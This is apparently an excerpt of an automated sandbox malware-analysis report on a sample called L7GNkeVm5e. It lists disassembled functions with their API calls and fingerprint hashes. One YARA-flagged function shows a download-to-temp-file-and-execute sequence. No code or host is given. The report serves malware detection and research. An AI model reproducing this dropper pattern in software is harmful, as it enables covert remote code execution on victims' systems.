                                                                                                                                                                                                                                                  • Instruction ID: 31ebf95bf6ffc4e57e2c8c80cbd10d2a141a3af953bb3480bf03f4d08dc5e152
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5E316F71A803059FEF22AF38E844B5677EBBF00311F1144A9E499D7260DF71E951CBA8
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _free
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 269201875-0
                                                                                                                                                                                                                                                  • Opcode ID: 4cb414690be6fda0ca229090f7b6620efc7f825f0c5babe970a6a28c94bdcbad
                                                                                                                                                                                                                                                  • Instruction ID: 1e1df55711acecdaceb3f6a2bcf6b580ecd3898991ab0d8f2f462f5a0a61d494
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4cb414690be6fda0ca229090f7b6620efc7f825f0c5babe970a6a28c94bdcbad
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 75C174B2D40205BBEB20DBA8CC43FEB77B8AB0C705F15515AFA05FB286D6B49D418B54
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • InternetOpenW.WININET(00451E78,00000000,00000000,00000000,00000000), ref: 02102C74
                                                                                                                                                                                                                                                  • InternetOpenUrlW.WININET(00000000,0045D818,00000000,00000000,00000000,00000000), ref: 02102C8A
                                                                                                                                                                                                                                                  • GetTempPathW.KERNEL32(00000105,?), ref: 02102CA6
                                                                                                                                                                                                                                                  • GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 02102CBC
                                                                                                                                                                                                                                                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 02102CF5
                                                                                                                                                                                                                                                  • InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 02102D31
                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 02102D4E
                                                                                                                                                                                                                                                  • ShellExecuteExW.SHELL32(?), ref: 02102DC5
                                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,00008000), ref: 02102DDA
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: File$Internet$OpenTemp$CreateExecuteNameObjectPathReadShellSingleWaitWrite
                                                                                                                                                                                                                                                  • String ID: <
                                                                                                                                                                                                                                                  • API String ID: 838076374-4251816714
                                                                                                                                                                                                                                                  • Opcode ID: 9bf731035bfec187241e890923bec375076f7805f2a0f07ea48903a7d88d49b3
                                                                                                                                                                                                                                                  • Instruction ID: 9c5cf0817d34a9ba4332d498f61a25efe71104bd1de775bf44caf5de95b69792
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9bf731035bfec187241e890923bec375076f7805f2a0f07ea48903a7d88d49b3
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E841417594021DAFEB209F649C85FEA77BCFF05745F0080E6A549E2190DFB09E898FA4
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(advapi32.dll,00000000,00000800,0045A064,00000000,?,?,00000000,00441C03,000000FF,?,0211F218,00000004,02117D77,00000004,02118059), ref: 0211EEE9
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,0211F218,00000004,02117D77,00000004,02118059,?,02118789,?,00000008,02117FFD,00000000,?,?,00000000,?), ref: 0211EEF5
                                                                                                                                                                                                                                                  • LoadLibraryW.KERNEL32(advapi32.dll,?,0211F218,00000004,02117D77,00000004,02118059,?,02118789,?,00000008,02117FFD,00000000,?,?,00000000), ref: 0211EF05
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,00447430), ref: 0211EF1B
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0211EF31
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0211EF48
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0211EF5F
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0211EF76
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0211EF8D
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AddressProc$LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                  • String ID: advapi32.dll
                                                                                                                                                                                                                                                  • API String ID: 2340687224-4050573280
                                                                                                                                                                                                                                                  • Opcode ID: b1baead230867a3f00ca1e51c1d382e39c45d004bab6a6c18617c1e862122828
                                                                                                                                                                                                                                                  • Instruction ID: bcc9df4d86a38fad168349cf4b72e653121be598de669704cff0a041a73d857c
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b1baead230867a3f00ca1e51c1d382e39c45d004bab6a6c18617c1e862122828
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F0217FB1944751BFE7106FB49C08B5ABFA8EF05B16F104A3AF941D3651CB7CC4408BA4
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(advapi32.dll,00000000,00000800,0045A064,00000000,?,?,00000000,00441C03,000000FF,?,0211F218,00000004,02117D77,00000004,02118059), ref: 0211EEE9
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,0211F218,00000004,02117D77,00000004,02118059,?,02118789,?,00000008,02117FFD,00000000,?,?,00000000,?), ref: 0211EEF5
                                                                                                                                                                                                                                                  • LoadLibraryW.KERNEL32(advapi32.dll,?,0211F218,00000004,02117D77,00000004,02118059,?,02118789,?,00000008,02117FFD,00000000,?,?,00000000), ref: 0211EF05
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,00447430), ref: 0211EF1B
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0211EF31
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0211EF48
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0211EF5F
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0211EF76
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 0211EF8D
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AddressProc$LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                  • String ID: advapi32.dll
                                                                                                                                                                                                                                                  • API String ID: 2340687224-4050573280
                                                                                                                                                                                                                                                  • Opcode ID: 99e788290a9b9b4e48efa8cfe9b0d171ae0e22239bfba1dadfb55c86f888b577
                                                                                                                                                                                                                                                  • Instruction ID: bcd9a298389d8bc29ba10838011ede29c861b9c788b8c385627c6352b1512e95
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 99e788290a9b9b4e48efa8cfe9b0d171ae0e22239bfba1dadfb55c86f888b577
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D0218EB1944791BFE7106FA49C08B5ABFACEF05B16F004A3AF941D3651DB7CD4408BA8
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,021166FB), ref: 021124A6
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,00446CDC), ref: 021124B4
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,00446CF4), ref: 021124C2
                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,00446D0C,?,?,?,021166FB), ref: 021124F0
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 021124F7
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,021166FB), ref: 02112512
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,021166FB), ref: 0211251E
                                                                                                                                                                                                                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02112534
                                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 02112542
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AddressProc$ErrorHandleLastModule$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                                                                                                                                                                                                                  • String ID: kernel32.dll
                                                                                                                                                                                                                                                  • API String ID: 4179531150-1793498882
                                                                                                                                                                                                                                                  • Opcode ID: 86a114dfe65ccc4fa04666bdd8c1bca5b9a7b223918886f6160c3780a9292853
                                                                                                                                                                                                                                                  • Instruction ID: 887fd7de0e0b5ca84523afeae22095cd70ee4244a58fc4ee67c578868a6931f7
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 86a114dfe65ccc4fa04666bdd8c1bca5b9a7b223918886f6160c3780a9292853
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7811E1759403307FE7117B74BC99AAB3BACAE02B127240536FC02D31A1EB38C5008AAC
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 00424856
                                                                                                                                                                                                                                                    • Part of subcall function 00424B25: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,00424589), ref: 00424B35
                                                                                                                                                                                                                                                  • Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 0042486B
                                                                                                                                                                                                                                                  • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042487A
                                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00424888
                                                                                                                                                                                                                                                  • Concurrency::details::FreeVirtualProcessorRoot::Affinitize.LIBCONCRT ref: 004248FE
                                                                                                                                                                                                                                                  • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042493E
                                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0042494C
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Concurrency::details::$Exception@8FreeProcessorRoot::ThrowVirtualstd::invalid_argument::invalid_argument$AffinitizeExecutionIdleObjectProxy::ResetSingleSuspendThreadWait
                                                                                                                                                                                                                                                  • String ID: pContext$switchState
                                                                                                                                                                                                                                                  • API String ID: 3151764488-2660820399
                                                                                                                                                                                                                                                  • Opcode ID: 3734a1ad1e391af5b1d37797e51a1a7898c33a57748dbc1e27873804117bc96e
                                                                                                                                                                                                                                                  • Instruction ID: ac479dc220ac8c4341dea52746a205dfcc737ca8ea5a0b270bd9d9db7e88fe8b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3734a1ad1e391af5b1d37797e51a1a7898c33a57748dbc1e27873804117bc96e
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F7312835B002249BCF04EF65D881A6E73B5FF84314FA1456BE915A7382DB78EE05C798
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 00419758
                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(000000FF,00000000), ref: 00419762
                                                                                                                                                                                                                                                  • DuplicateHandle.KERNEL32(00000000), ref: 00419769
                                                                                                                                                                                                                                                  • SafeRWList.LIBCONCRT ref: 00419788
                                                                                                                                                                                                                                                    • Part of subcall function 00417757: Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00417768
                                                                                                                                                                                                                                                    • Part of subcall function 00417757: List.LIBCMT ref: 00417772
                                                                                                                                                                                                                                                  • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041979A
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 004197A9
                                                                                                                                                                                                                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004197BF
                                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 004197CD
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CurrentListProcess$AcquireConcurrency::details::_Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorDuplicateErrorException@8HandleLastLock::_ReaderSafeThrowWriteWriterstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                  • String ID: eventObject
                                                                                                                                                                                                                                                  • API String ID: 1999291547-1680012138
                                                                                                                                                                                                                                                  • Opcode ID: af56e6474bfbcfb1548dec2f01f626fb8f62d732f61f1ac0c92eedc387ce09ea
                                                                                                                                                                                                                                                  • Instruction ID: beae42e10eedb78f2922afb802a2acb8663f7a2576d102abe215b1da82e9749d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: af56e6474bfbcfb1548dec2f01f626fb8f62d732f61f1ac0c92eedc387ce09ea
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4C11AC75500204EACB14EFA4CC4AFEE77B8AF00701F20413BF41AE21D1EB789E88866D
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 02120C26
                                                                                                                                                                                                                                                  • Concurrency::details::UMS::CreateUmsCompletionList.LIBCONCRT ref: 02120C8D
                                                                                                                                                                                                                                                  • Concurrency::details::InternalContextBase::ExecutedAssociatedChore.LIBCONCRT ref: 02120CAA
                                                                                                                                                                                                                                                  • Concurrency::details::InternalContextBase::WorkWasFound.LIBCONCRT ref: 02120D10
                                                                                                                                                                                                                                                  • Concurrency::details::InternalContextBase::ExecuteChoreInline.LIBCMT ref: 02120D25
                                                                                                                                                                                                                                                  • Concurrency::details::InternalContextBase::WaitForWork.LIBCONCRT ref: 02120D37
                                                                                                                                                                                                                                                  • Concurrency::details::InternalContextBase::SwitchTo.LIBCONCRT ref: 02120D65
                                                                                                                                                                                                                                                  • Concurrency::details::UMS::GetCurrentUmsThread.LIBCONCRT ref: 02120D70
                                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 02120D9C
                                                                                                                                                                                                                                                  • Concurrency::details::WorkItem::TransferReferences.LIBCONCRT ref: 02120DAC
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Concurrency::details::$Base::ContextInternal$Work$ChoreCurrentThread$AssociatedCompletionCreateException@8ExecuteExecutedFoundInlineItem::ListReferencesSwitchThrowTransferWait
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3720063390-0
                                                                                                                                                                                                                                                  • Opcode ID: 5c88d6c2783884595e80d68d3e5870dbc5133051b1680621d86c5f4de34e2022
                                                                                                                                                                                                                                                  • Instruction ID: 13e8d3024f9937c465eac71e3414de26aea2c77459e0d02c6539a4d7d9791b0c
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5c88d6c2783884595e80d68d3e5870dbc5133051b1680621d86c5f4de34e2022
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8E41F630A8026C9FCF18FFA4C4907ED77A6AF19304F0441A9E9456B2D2CB765A1DCF62
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00431DEA
                                                                                                                                                                                                                                                    • Part of subcall function 0043345A: HeapFree.KERNEL32(00000000,00000000,?,0043A0E8,?,00000000,?,00000000,?,0043A38C,?,00000007,?,?,0043A780,?), ref: 00433470
                                                                                                                                                                                                                                                    • Part of subcall function 0043345A: GetLastError.KERNEL32(?,?,0043A0E8,?,00000000,?,00000000,?,0043A38C,?,00000007,?,?,0043A780,?,?), ref: 00433482
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00431DF6
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00431E01
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00431E0C
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00431E17
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00431E22
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00431E2D
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00431E38
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00431E43
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00431E51
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                                                                  • Opcode ID: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                                                                                                                                                                                                                  • Instruction ID: 87776794b7e7eece0f25d73b1b75ae69850b50dc626e3fc0762df5fa29964573
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9011A776500108BFDB02EF55C852CD93B65EF18356F0190AAF9184B232DA35DF519F88
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 02132051
                                                                                                                                                                                                                                                    • Part of subcall function 021336C1: HeapFree.KERNEL32(00000000,00000000,?,0213A34F,?,00000000,?,00000000,?,0213A5F3,?,00000007,?,?,0213A9E7,?), ref: 021336D7
                                                                                                                                                                                                                                                    • Part of subcall function 021336C1: GetLastError.KERNEL32(?,?,0213A34F,?,00000000,?,00000000,?,0213A5F3,?,00000007,?,?,0213A9E7,?,?), ref: 021336E9
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0213205D
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 02132068
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 02132073
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0213207E
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 02132089
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 02132094
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0213209F
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 021320AA
                                                                                                                                                                                                                                                  • _free.LIBCMT ref: 021320B8
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                                                                  • Opcode ID: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                                                                                                                                                                                                                  • Instruction ID: e79338f48ae0d403a90321f77fbeeab98d5c9867fbd36c9146409db446fed4a7
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dff188c56af8bee3fd9e149c250172911bfba27409d3e3615d5ba8f14f079428
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E6113FB6950108AFCF02EF94C941D993FABEF04350B5185A5BA188B271DB31EA649FC4
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: __cftoe
                                                                                                                                                                                                                                                  • String ID: <(@$<(@
                                                                                                                                                                                                                                                  • API String ID: 4189289331-1745028333
                                                                                                                                                                                                                                                  • Opcode ID: bbe416c8d69575f9d93ce627a81c40a4a4bf106591ac0e44be9dd0909605bb26
                                                                                                                                                                                                                                                  • Instruction ID: dd19a4b5401c40ac365bd4b6466f4abdac11a3aecfb9adebaa38ddcec4c103bf
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bbe416c8d69575f9d93ce627a81c40a4a4bf106591ac0e44be9dd0909605bb26
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 18512C32A00111EBDB149B5BEC41EAB77ADEF49325F90415FF81592282DB39D900866D
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0044017F), ref: 0043EEB5
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: DecodePointer
                                                                                                                                                                                                                                                  • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                                                                                                                                                                                  • API String ID: 3527080286-3064271455
                                                                                                                                                                                                                                                  • Opcode ID: d21bb7d67464a32b5cb6785f7c0f44f77b7a5dc18ca1c6f51477ac7f13519174
                                                                                                                                                                                                                                                  • Instruction ID: 29b0adf4cd4a19bf6d80e559d7e92663f8e6ec8767138eee3bf00a563bc4ae44
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d21bb7d67464a32b5cb6785f7c0f44f77b7a5dc18ca1c6f51477ac7f13519174
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4851A07090150ADBCF14DFA9E9481AEBBB0FB0D300F2551A7D480A62A5C7B99D29CB1E
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4540099651.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_2100000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  • Opcode ID: 2096f585af2949bbcbeb02ba378e27ab7de49007c7775bea8d51a9bce3371cac
                                                                                                                                                                                                                                                  • Instruction ID: 8c77a33a39e060f4423344fcfec09ad99134287e64d1d88f3512c668b29cef46
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2096f585af2949bbcbeb02ba378e27ab7de49007c7775bea8d51a9bce3371cac
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EEC1E471D84349AFDB17DFA8D844BAEBBB2AF09310F0441D5E424A7392C7359941CBA9
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • FindSITargetTypeInstance.LIBVCRUNTIME ref: 00428D00
                                                                                                                                                                                                                                                  • FindMITargetTypeInstance.LIBVCRUNTIME ref: 00428D19
                                                                                                                                                                                                                                                  • FindVITargetTypeInstance.LIBVCRUNTIME ref: 00428D20
                                                                                                                                                                                                                                                  • PMDtoOffset.LIBCMT ref: 00428D3F
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.4539550646.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_L7GNkeVm5e.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: FindInstanceTargetType$Offset
                                                                                                                                                                                                                                                  • String ID: Bad dynamic_cast!
                                                                                                                                                                                                                                                  • API String ID: 1467055271-2956939130
                                                                                                                                                                                                                                                  • Opcode ID: 6b652844560000745936e8dd829dcd732162928c29c706bfbf939b01ea652829
                                                                                                                                                                                                                                                  • Instruction ID: f58e39392761fe45c588d51cd7f0347041c183eb1b6093b38bd943e8a3a40f23
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6b652844560000745936e8dd829dcd732162928c29c706bfbf939b01ea652829
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 16214972B022259FDB04DF65FD02AAE77A4EF54714B50411FF900932C1DF38E90586A9
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • atomic_compare_exchange.LIBCONCRT ref: 0211C6CC
                                                                                                                                                                                                                                                  • atomic_compare_exchange.LIBCONCRT ref: 0211C6F0
                                                                                                                                                                                                                                                  • std::_Cnd_initX.LIBCPMT ref: 0211C701
                                                                                                                                                                                                                                                  • std::_Cnd_initX.LIBCPMT ref: 0211C70F
                                                                                                                                                                                                                                                    • Part of subcall function 02101370: __Mtx_unlock.LIBCPMT ref: 02101377
                                                                                                                                                                                                                                                  • std::_Cnd_initX.LIBCPMT ref: 0211C71F
                                                                                                                                                                                                                                                    • Part of subcall function 0211C3DF: __Cnd_broadcast.LIBCPMT ref: 0211C3E6
                                                                                                                                                                                                                                                  • Concurrency::details::_RefCounter::_Release.LIBCONCRT ref: 0211C72D
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
